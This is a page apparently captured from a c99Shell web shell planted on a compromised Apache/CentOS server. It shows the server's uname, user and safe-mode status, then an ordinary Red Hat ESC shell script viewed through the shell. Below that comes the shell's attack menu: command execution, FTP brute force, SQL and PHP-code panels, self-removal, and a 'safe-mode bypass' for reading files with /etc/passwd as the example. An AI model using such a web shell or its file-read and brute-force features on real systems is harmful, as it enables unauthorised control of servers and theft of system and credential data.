!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/bin/   drwxr-xr-x
Free 52.29 GB of 127.8 GB (40.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     esc (3.36 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/bin/sh # # BEGIN COPYRIGHT BLOCK # This Program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by the Free Software # Foundation; version 2 of the License. # # This Program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with # this Program; if not, write to the Free Software Foundation, Inc., 59 Temple # Place, Suite 330, Boston, MA 02111-1307 USA. # # Copyright (C) 2005 Red Hat, Inc. # All rights reserved. # END COPYRIGHT BLOCK DO_FORCEMODE="false" DO_SHOW_VERSION="false" ESC_ARGS= ESC_PROFILE_BASE=~/.redhat/esc ESC_LOG_FILE=esc.log ESC_PATH=/usr/lib/esc-1.1.0 ESC_BIN_PATH=/usr/bin ESC_EXEC=esc ESCD_EXEC=escd ESC_BIN=$ESC_PATH/xulrunner/xulrunner-bin ESCD_BIN=./$ESCD_EXEC LAST_PROG_PID=0 SIGUSR1=10 FORCE_START_ESC= XPTI_DAT=xpti.dat COMPREG_DAT=compreg.dat LOCK_FILE=lock PARENT_LOCK_FILE=.parentlock function isProgRunning { userID=$(whoami) isProgRunning=$(pgrep -U $userID -f $1) if [ $isProgRunning ]; then LAST_PROG_PID=$isProgRunning return 0 fi LAST_PROG_PID=0 return 1 } function removeFile { rm -f $1 } function cleanupProfile { removeFile $ESC_PROFILE_BASE/*default/$XPTI_DAT removeFile $ESC_PROFILE_BASE/*default/$COMPREG_DAT removeFile $ESC_PROFILE_BASE/*default/$LOCK_FILE removeFile $ESC_PROFILE_BASE/*default/$PARENT_LOCK_FILE } function processArgs { for arg in $1 do #echo "theArg: $arg" if [ $arg == "forceStartESC" ] then #echo "Do force mode!" FORCE_START_ESC="true" fi if [ $arg == "keyInserted" ] then FORCE_START_ESC="true" fi if [ $arg == "-version" ] then #echo "Do show version!" DO_SHOW_VERSION="true" fi done } processArgs $* if [ ! -d $ESC_PROFILE_BASE ] then mkdir -p $ESC_PROFILE_BASE fi cd $ESC_PATH #First check if we just want the version if [ $DO_SHOW_VERSION == "true" ] then #echo "try to run the version command!" ESC_ARGS="-version" ./$ESC_EXEC $ESC_ARGS exit 0 fi # Start up the daemon if it is not running isProgRunning $ESCD_BIN if [ $LAST_PROG_PID -gt 0 ] then false #echo "escd already running." else #echo "escd not running start." cleanupProfile ./$ESCD_EXEC --key_Inserted=\"/usr/bin/esc\" --on_Signal=\"/usr/bin/esc\" exit 0 fi # Now check to see if we wer signaled from the daemon if [ $FORCE_START_ESC ] then #echo "force start esc." #Check to see if esc is already running isProgRunning $ESC_BIN if [ $LAST_PROG_PID -gt 0 ] then #echo "attempting a force start but already running ... exit." exit 0 fi #echo "force start esc not running start esc..." ./$ESC_EXEC exit 0 fi isProgRunning $ESC_BIN if [ $LAST_PROG_PID -gt 0 ] then #echo "esc already running." ./$ESC_EXEC exit 0 else #echo "esc not already running start up and bring up window." ./$ESC_EXEC & sleep 4 #echo "done sleeping bring up esc window." ./$ESC_EXEC exit 0 fi exit 0

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0047 ]--